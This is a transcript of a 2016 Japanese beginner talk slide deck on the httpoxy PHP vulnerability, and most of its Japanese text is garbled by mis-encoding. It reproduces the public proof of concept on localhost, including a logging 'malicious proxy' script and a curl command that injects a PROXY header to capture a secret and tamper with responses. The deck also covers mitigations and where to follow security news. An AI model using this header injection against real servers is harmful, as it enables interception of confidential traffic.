$30 off During Our Annual Pro Sale. View Details »

初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

uzulla
July 20, 2016

初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

PHPBLT #5でほぼしゃべらなかったLTの資料です。

uzulla

July 20, 2016
Tweet

More Decks by uzulla

Other Decks in Technology

Transcript

  1. PHPBLT#5
    Httpoxyͱ͔ͷ࿩
    20160720
    uzulla

    View Slide

  2. ࣗݾ঺հ
    • Junichi Ishida aka uzulla
    • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢
    • HachiojiͳΜͨΒͱ͔
    • ͳΜͨΒHacjioji in ඼઒ͱ͔

    View Slide

  3. Httpoxy
    • https:/
    /httpoxy.org/
    • ࡉ޻ͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦΁ͷϦΫΤε
    τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ
    • ΞϓϦ͔Βଞͷαʔόʔ΁ͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ
    • ͋Δ͍͸ɺվ͟Μ΋Ͱ͖ΔՄೳੑ
    • ΈΜͳௐࠪࡁΈͩΑͶʂʁ
    • ʢΈΜͳ஌͍ͬͯͨΒ਺ϖʔδඈ͹͢ʣ

    View Slide

  4. View Slide

  5. • ʮCLIͰΑ͋͘Δ࢓༷ʯͱʮCGIͷ࢓༷ʯͷিಥ͕ݪҼ
    • HTTP_PROXY؀ڥม਺ͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ
    ͕Α͋͘Δ
    • ΢ΣϒΞϓϦʹ͸ʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣ͸PHPͰ
    CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ
    • ͯ͞ɺCGIͷ࢓༷Ͱ͸ʢྫ͑͹ʣHOGEͱ͍͏ϦΫΤετϔομ
    ʔΛHTTP_HOGE؀ڥม਺ʹอଘ͢Δͷ͕ͩ…ɻ
    • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏؀ڥม਺͕
    ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ

    View Slide

  6. • CGIϦεϖΫτͳPHP͸mod_php΍fastcgi΋͜ͷ࢓༷
    • ͳ͓ɺPHPࣗମ͸௚઀͜ͷ੬ऑੑ͸Өڹ͠ͳ͍
    • օେ޷͖file_get_contents͸Өڹͳ͍
    • ͕Μ͹ͬͯ࡞Γ͜·ͳ͚Ε͹Өڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ
    • HTTP_PROXYΛड͚ೖΕΔ୅දతͳϥΠϒϥϦͱͯ͠guzzle
    • 6.2.1Ͱमਖ਼
    • guzzle͸࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠࢖ΘΕ͍ͯ
    ΔɺͳͷͰ࿩୊ʹͳͬͨͷͰͨ͠ʂ

    View Slide

  7. ͳ͓…
    • ઃఆͰ͖Δͷ͸HTTP_PROXY؀ڥม਺Ͱ͋ͬͯɺHTTPS_PROXY؀
    ڥม਺͸ࢦఆͰ͖ͳ͍
    • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ
    • ͭ·Γɺ৐ͬऔΕΔͷ͸HTTP
    • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ
    • େ఍ͷϠόΠ৘ใ͸HTTPSͩΖ͏…ଟ෼…ɻ

    View Slide

  8. ΦνͱͳΔରࡦ͸
    • !΢Σϒαʔό౳ͰɺPHPͷࣄલʹϔομʔΛམͱ͢
    • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢
    • ίʔυΛ௚͢
    • ϥΠϒϥϦͷόʔδϣϯΞοϓ
    • ❌ʮίʔυઌ಄ͱ͔Ͱ؀ڥม਺্ॻ͖͢Ε͹͍͍ͷͰ͸ʁʯ
    ʮ࢒೦ͳΒແཧͳͷͰ͢ʯ

    View Slide

  9. ͜͜·Ͱ͸օ͞Μ͝ଘ͡
    • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ
    • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ
    • ʮࣗ෼Ͱʯௐࠪ΍ରԠͯ͠·͔͢ʁ
    • ʮࣗ෼Ͱʯීஈ͔Β৘ใऩूͯ͠·͔͢ʁ
    • ʢͳ͓ϑϦʔλʔ͸ݽಠͳͷͰ౰વηϧϑαʔϏε…ʣ

    View Slide

  10. ࢼͯ͠·͔͢ʁ
    • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ
    • ੬ऑੑ͸ࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ
    • ௨ৗࣗ෼Ͱ࣮૷͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ
    ΋ଟ͍
    • Proof of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ
    • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ
    • ʢ࠷ۙࢮޠɿexploit codeʣ

    View Slide

  11. ࢼͦ͏ʂ
    • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ

    View Slide

  12. • PoC͸Ͳ͜ʹ͋Δ͔ʁ
    • CVE౳ʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱ͸ͳ͍ɺͷͰ୳͢
    • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ΋͍ΔͷͰ…
    • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢ΍Exploitʣ͸ઈରʹ࣮ߦ͢Δͳʂʂʂ
    • CVEͱ͔ʹ৐ͬͯΔౕ͸େৎ෉ͩΖ͏͕ɺ໺ྑͷExploit͸ഁ
    յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ
    • ࠓճ͸httpoxy͕ެ։͍ͯͨ͠
    • https:/
    /github.com/httpoxy/php-fpm-httpoxy-poc

    View Slide

  13. // ݩͷίʔυ͸͜ͷΑ͏ͳײ͡
    // "guzzlehttp/guzzle": "~6.0"
    $client = new GuzzleHttp\Client();
    $client->request(
    'POST',
    'http://my-internal-microservice.example.com/',
    ['secret' => 'some-really-secret-string']
    );
    echo "Request sent\n";

    View Slide

  14. // ͦͷ··Ͱ͸࢖͑ͳ͍ͷͰɺίʔυमਖ਼
    // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ
    // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ
    require 'vendor/autoload.php';
    $client = new GuzzleHttp\Client();
    $res = $client->request(
    'POST',
    'http://127.0.0.1:8002/api.php?himi=tsu',
    ['form_params' => ['secret' => 'I_AM_PHPER']]
    );
    echo $res->getBody();

    View Slide

  15. API(?!)Λ࡞੒
    // api.php
    echo "BLT!BLT!";

    View Slide

  16. ΞϓϦͱAPI(?!)Λىಈ
    $ composer install
    $ php -S 127.0.0.1:8001 index.php
    # ผγΣϧͰ
    $ php -S 127.0.0.1:8002 api.php

    View Slide

  17. ͨΊͯ͠ΈΔ
    $ curl 'http://localhost:8001/'
    BLT!BLT!
    • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK

    View Slide

  18. ѱҙ͋ΔProxyΛ༻ҙ͢Δ
    • ͝ՈఉʹProxy͕͋Δํ͸ෆཁ
    • Charlesͱ͔
    • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙ͸ͳʹ͕ϋϠϦͳͷʁ)

    View Slide

  19. ѱҙ()͋ΔࡶͳproxyΛॻ͘
    $uri = $_SERVER['REQUEST_URI'];
    $body = file_get_contents('php://input');
    $method = $_SERVER['REQUEST_METHOD'];
    error_log($body);
    error_log(print_r($_SERVER,1));
    require 'vendor/autoload.php';
    $client = new GuzzleHttp\Client();
    $res = $client->request($method, $uri, ['body' => $body]);
    echo $res->getBody();

    View Slide

  20. ࡶͳProxyʹ͍ͭͯ
    • ੒ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ
    • ద౰ʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ
    ʢproxy͔ͩΒͶ…ʣ
    • ͜ͷίʔυ͸ࡶͰةݥͳͷͰ࣮ݧҎ֎ʹ͸ઈରʹ࢖͏ͳΑʂ
    • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ

    View Slide

  21. ࡶͳproxy্ཱͪ͛
    $ php -S 127.0.0.1:8003 proxy.php

    View Slide

  22. ࣮ࡍʹ੬ऑੑΛςετͩʂ
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    BLT!BLT!

    View Slide

  23. • ʮ࢒೦͜ΕͰ͸͏͖͝·ͤΜʯ
    • ͳΜͱbuiltin server ͸੬ऑੑ͕ͳ͍ʂ͆
    • ͱ͍͏͜ͱͰɺ੿࡞apachehereΛ͔ͭ͏(໪࿦ͳΜͰ΋͍͍͚Ͳ)
    • https:/
    /github.com/uzulla/apachehere
    $ apachehere -p 8001
    DocumentRoot : /xxx
    php-cgi
    open : http://127.0.0.1:8001/

    [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php

    View Slide

  24. ϦτϥΠʂ
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    BLT!BLT!

    View Slide

  25. ੒ޭ͢Δͱproxyͷϩάʹ…
    [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
    [Wed Jul 20 02:01:43 2016] Array
    (
    [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc
    [REMOTE_ADDR] => 127.0.0.1
    [REMOTE_PORT] => 53696
    [SERVER_SOFTWARE] => PHP 7.0.3 Development Server
    [SERVER_PROTOCOL] => HTTP/1.1
    [SERVER_NAME] => 127.0.0.1
    [SERVER_PORT] => 8003
    [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
    [REQUEST_METHOD] => POST
    [SCRIPT_NAME] => /api.php
    [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php
    [PHP_SELF] => /api.php
    [QUERY_STRING] => himi=tsu
    [HTTP_HOST] => 127.0.0.1:8002
    [HTTP_PROXY_CONNECTION] => Keep-Alive
    [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3
    [CONTENT_TYPE] => application/x-www-form-urlencoded
    [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded
    [CONTENT_LENGTH] => 17
    [HTTP_CONTENT_LENGTH] => 17
    [REQUEST_TIME_FLOAT] => 1468947703.6871
    [REQUEST_TIME] => 1468947703
    )

    View Slide

  26. [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
    [Wed Jul 20 02:01:43 2016] Array
    (
    snip
    [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
    • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ

    View Slide

  27. proxyΛमਖ਼͢Ε͹…
    // proxy.php
    //echo $res->getBody();
    echo "ീԦࢠʂീԦࢠʂ";
    • ͱमਖ਼ͯ͠
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    ീԦࢠʂീԦࢠʂ
    • վ͟Μ੒ޭͰ͢Ͷʂ

    View Slide

  28. ͱ͍͏͜ͱͰɺ
    • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ
    • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷ͸ॏཁɺษڧʹͳΔ
    • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ
    • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ

    View Slide

  29. ͋ͱɺ৻ॏʹͶʂ
    • ύονόʔδϣϯΛ؁͘Έͯ͸͍͚ͳ͍
    • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮࿩ʯ
    exception:
    php_sapi_name() has been disabled for security reasons.
    It can be re-enabled by adding it to
    the google_app_engine.enable_functions ini variable
    in your applications php.ini
    • ʮGAE ͕ѱ͍ ͷ࢓༷Ͱ͸ʁʯʮ͔ͨ͠ʹʯ

    View Slide

  30. Ͱ͸υίͰ஌Δ͔ʁ
    • օ͞Μ͸Ͳ͜Ͱ஌ͬͯ·͔͢ʁ

    View Slide

  31. ໰୊Λ΢Υον͠ଓ͚Δ
    • ໘౗͕ͩ࢓ࣄͩʂ
    • TwitterͳͲSNSͰ஌Δ
    • CVEͳͲΛߪಡ͢Δ
    • χϡʔεαΠτΛߪಡ͢Δ
    • ެࣜϦϦʔεΛߪಡ͢Δ

    View Slide

  32. TwitterͳͲSNS
    • ଎ใੑ͕ߴ͍ɺ5ׂ͘Β͍͸͜͜ͰଘࡏΛ஌ΔࣄʹͳΔ
    • ʢPHPͷਓͰ͸ͳ͆͘ʣJSɺGoɺPerl΍Πϯϑϥํ໘ͳͲͷਓΛ
    ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ
    • ৄ͍͠ਓ͸౰વ࿩୊ʹ͢Δ͜ͱ͕ଟ͍͠ɺ
    ʢΘ͔͍ͬͯΔͷͰʣҰ࣍৘ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍

    View Slide

  33. ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ
    • http:/
    /jvn.jp/report/
    • JVNɺ೔ຊޠɺ·ͣ͸͚ͩ͜͜Ͱ΋ྑ͍ʢͱࢥ͏ʣ
    • Feed΋͋ΔΑ
    • https:/
    /www.jpcert.or.jp/
    • JPCERTɺϝϧϚΨ΋͋ΔΑʂ

    View Slide

  34. • https:/
    /nvd.nist.gov/download.cfm
    • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར
    • CVE͸΄΅Ұ࣍৘ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ
    • https:/
    /security.sensiolabs.org/database
    • PHPϥΠϒϥϦͷ৘ใɺFeed͕͋ΔͷͰศར

    View Slide

  35. ҰൠతͳχϡʔεαΠτ౳
    • ҰൠతͳITܥχϡʔεαΠτ͸…ຊจ͸ಡ·ͣʹ͙͢ʹϦϯΫઌ
    ͷҰ࣍৘ใ΁ݴͬͨํ͕ྑ͍…ɻ

    View Slide

  36. • reddit֤छɺ଎ใੑߴ͍͕ίϝϯτ͸͙͢ʹ৴༻͠ͳ͍Α͏ʹ
    • https:/
    /www.reddit.com/r/netsec
    • https:/
    /www.reddit.com/r/sysadmin
    • https:/
    /www.reddit.com/r/PHP
    • hackernewsɺ଎͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘
    • https:/
    /news.ycombinator.com/news

    View Slide

  37. ެࣜαΠτ
    • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ
    • ࣗ෼͕͔͍ͭͬͯΔϑϨʔϜϫʔΫ΍ϥΠϒϥϦ΍PHPͷϦϦ
    ʔεͱ͔͸Έͯ΋ྑ͍ͷͰ͸ʁʁ

    View Slide

  38. blog
    • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔
    • ηΩϡϦςΟاۀͷϒϩά΋Α͍
    • ౰વ͚ͩͲɺ໢ཏੑ͕ͳ͍
    • ʮ୯ޠʯΛ஌ͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰ΋Α͍
    • झຯ͕ͰΔͷͰলུ

    View Slide

  39. Branded Vulnerability ͳαΠτ
    • ࠷ۙ͸Ωϟονʔͳ໊લ͕෇͘ɺHttpoxy΋ͦ͏
    • GHOST,FREAK,POODLE౳ʑ
    • ·ͱΊαΠτΈ͍ͨͳ΋ͷɺγΣΞ͠΍͘͢ΩϟονʔͳΞΠ
    ίϯ͕͋ͬͨΓͯ͠Α͍
    • ଟ͘ͷ৔߹CVEΑΓ͸Θ͔Γ΍͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ
    Ͱ΋OK͕ͩɺӳޠͰ͢ɻ
    • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱ͸ͳ͍ɺٯ΋·͔ͨ͠Γ

    View Slide

  40. ৘ใΩϟον·ͱΊ
    • ΢Υονʹ͸RSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ
    ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱ͸ͳ͍͆ʣ
    • JPCERTͱJVN͘Β͍͸ొ࿥ͯ͠Α͍ͷͰ͸
    • Branded VulnerabilityͳαΠτ͕͋Ε͹·ͣνΣοΫ
    • ӳޠ͕ॏཁʢʣ
    • ࿨༁΍ղઆهࣄ͸Ұ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚
    Ε͹߄ͯͣʹਖ਼࠲ͯ͠଴ͭ͜ͱ

    View Slide

  41. That's all folks!
    • ੬ऑੑ͸ࣗ෼Ͱ΋ͨΊͦ͏ʂ
    • χϡʔεΛͪΌΜͱݟΑ͏ʂ
    • ͪΌΜͱ੬ऑੑΛ೺Ѳͯ͜͠ʂ
    • Httpoxyɺ͋Μ·Γ೿खͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ
    // enjoy !
    $ grep -r HTTP_PROXY /your/codes/

    View Slide